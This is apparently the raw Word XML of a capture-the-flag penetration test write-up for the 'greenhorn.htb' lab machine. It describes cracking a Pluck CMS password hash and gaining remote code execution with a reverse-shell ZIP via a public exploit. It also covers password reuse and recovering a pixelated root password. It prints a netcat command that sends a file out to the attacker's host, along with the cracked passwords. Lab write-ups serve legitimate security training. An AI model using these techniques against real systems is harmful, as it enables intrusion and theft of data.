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F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Penetration Test Report</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1B">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1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IP Address:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>10.10.11.25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1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Domain Name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>greenhorn.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1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Operating System:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux (detected via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1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Services:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1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SSH (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 8.9p1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1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HTTP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.18.0 hosting Pluck CMS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B" w:rsidP="00645F1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HTTP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gitea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platform on port 3000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B"/>
    <w:p w:rsidR="00645F1B" w:rsidRDefault="00645F1B"/>
    <w:p w:rsidR="00454608" w:rsidRDefault="00FD1457">
      <w:r w:rsidRPr="00FD1457">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B98168C" wp14:editId="1FAD549A">
            <wp:extent cx="4741494" cy="507076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351" cy="50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Exploitation</w:t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Port 80 (Pluck CMS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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CMS version identified as Pluck 4.7.18.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Key findings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Endpoints: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login.php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admin.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Access to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admin.php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required login credentials.</w:t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Port 3000 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Gitea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Hosted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Gitea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platform provided the source code for the main website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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 Code Review Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Passwords hashed using SHA512.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Password hash found at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data/settings/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pass.php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Password Retrieval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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SHA512 hash in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pass.php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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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dehashed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an online tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Password: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iloveyou1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Login successful at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login.php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96C95" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95" w:rsidP="00C96C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4608">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77CA0EA3" wp14:editId="1DA07110">
            <wp:extent cx="4958943" cy="38941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083" cy="38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57" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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C96C95" w:rsidRDefault="00C96C95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C96C95" w:rsidRDefault="00C96C95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C96C95" w:rsidRDefault="00C96C95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Admin Panel Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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admin panel allowed file uploads but had extensions filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Initial attempts to bypass restrictions (e.g., null-byte injection) failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Exploited Pluck CMS RCE vulnerability (Exploit-DB ID: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00FD14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51592</w:t>
        </w:r>
      </w:hyperlink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) by uploading a ZIP file containing a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Successful RCE established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C96C95" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95" w:rsidP="00C96C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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4700C53A" wp14:editId="039B1A91">
            <wp:extent cx="4738255" cy="474464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866" cy="47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57" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Privilege Escalation</w:t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User </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD145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junior</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Found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user.txt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 file,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Using OpenVAS.pdf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/home/junior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D1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Attempt to read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user.txt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restricted by permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Guessed the password for user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junior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iloveyou1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(same as admin password). Successful.</w:t>
      </w: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File Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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netcat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transfer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Using OpenVAS.pdf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local machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95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:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457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# Sender (on shell):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95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-w 3 10.10.14.77</w:t>
      </w:r>
      <w:r w:rsidR="00FD1457"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12345 &lt; 'Using OpenVAS.pdf'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457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FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457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# Receiver (on local machine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRDefault="00FD1457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proofErr w:type="gramEnd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lp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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12345 &gt; output.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C96C95" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95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FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD145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Root Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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The PDF contained a pixelated password for the root account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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De-pixelated the password using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Depix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tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD145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Extracted the image using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pdfimages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FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95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:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95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FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD1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pdfimages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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output.pdf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pix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD145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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Depix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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reconstruct the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Root Password: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sidefromsidetheothersidesidefromsidetheotherside</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FD1457" w:rsidRPr="00FD1457" w:rsidRDefault="00FD1457" w:rsidP="00FD14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Logged in as root and retrieved </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>root.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD145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D1457" w:rsidRPr="00FD1457" w:rsidRDefault="00C96C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1457">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47B02B93" wp14:editId="4C849226">
            <wp:extent cx="5243413" cy="5607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413" cy="56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8" w:rsidRDefault="003444E8"/>
    <w:p w:rsidR="003444E8" w:rsidRDefault="003444E8"/>
    <w:p w:rsidR="00611760" w:rsidRDefault="00611760"/>
    <w:sectPr w:rsidR="00611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B07C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBA6C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F96C25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FCE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893351"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCF8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D7250A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4862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7A110E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F53C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655703"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4888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A4B7664"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F24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D9425B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B134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760"/>
    <w:rsid w:val="00016C8D"/>
    <w:rsid w:val="003444E8"/>
    <w:rsid w:val="00454608"/>
    <w:rsid w:val="0058235B"/>
    <w:rsid w:val="00611760"/>
    <w:rsid w:val="00645F1B"/>
    <w:rsid w:val="00C96C95"/>
    <w:rsid w:val="00CF50C7"/>
    <w:rsid w:val="00FD1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F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FD14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FD145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76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FD145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FD1457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FD14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14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D145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45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FD1457"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FD1457"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD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semibold">
    <w:name w:val="fontsemibold"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00645F1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00645F1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F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FD14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FD145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76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FD145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FD1457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FD14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14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D145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45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FD1457"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FD1457"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD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semibold">
    <w:name w:val="fontsemibold"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00645F1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00645F1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6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2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6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ploit-db.com/exploits/51592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2024-11-18T08:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-18T18:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>